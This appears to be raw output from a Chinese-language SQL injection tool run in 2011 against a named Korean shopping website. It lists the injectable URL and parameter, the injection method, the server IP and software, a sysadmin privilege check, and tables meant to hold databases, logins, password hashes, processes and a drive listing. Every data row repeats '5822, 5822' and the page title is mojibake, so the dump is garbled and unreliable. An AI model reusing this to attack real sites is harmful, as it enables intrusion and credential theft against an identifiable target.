■漏洞信息:============================================================
 ・URL:http://shopmanet.co.kr/info/brand/brand_delete.asp?ID=5822&category=%C7%C7%C7%F5/?update=ok&ID=5822&category=%C7%C7%C7%F5/%C0%E2%C8%AD%B7%F9
 ・页面标题：讥付齿[ShopMa.net] 魄概流 老磊府 秒诀器判_狼幅,棱拳,拳厘前,厘脚备,啊傈,啊备,魔备,寇侥,魄概流,魄概荤盔,魄盟荤盔,讥付胶磐ShopMaster,讥概聪廉ShopManager::
 ・参数:update=ok&ID=5822&category=%C7%C7%C7%F5/%C0%E2%C8%AD%B7%F9
 ・方法:GET
 ・类型:Numeric
 ・利用方法:And
 ・脚本语言:asp
 ・IP:66.232.142.154
 ・数据库:SQL Server
 ・HEAD:
HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Sun, 03 Apr 2011 16:02:28 GMT
P3P: CP="ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT 
Connection: Keep-Alive
Content-Length: 1739
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCDDBCTC=HOCEGJDBMKBFJONIGCGBCMAF; path=/
Cache-control: private



■数据库信息:============================================================
- 数据库名：5822, 5822

 ・当前用户权限：
sysadmin(sa): 5822, 5822

 ・数据库信息:
db_name	filename
----------------------------------------------------------------------------------------------------
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822

 ・SQL Server用户名列表：
用户名		角色		安全编号
----------------------------------------------------------------------------------------------------
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822

 ・数据库相关进程信息:
程序名	状态	主机名	主机进程ID	命令行	NT用户名
----------------------------------------------------------------------------------------------------
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822

 ・链接的服务器信息:
服务器名	服务器产品	提供者名	数据源	位置	服务器网络名
----------------------------------------------------------------------------------------------------
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822

 ・数据库用户登录信息：
用户名	密码HASH	数据库编号	语言	时间1	时间2
----------------------------------------------------------------------------------------------------
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822
5822, 5822

Dir of D:: 
5822, 5822
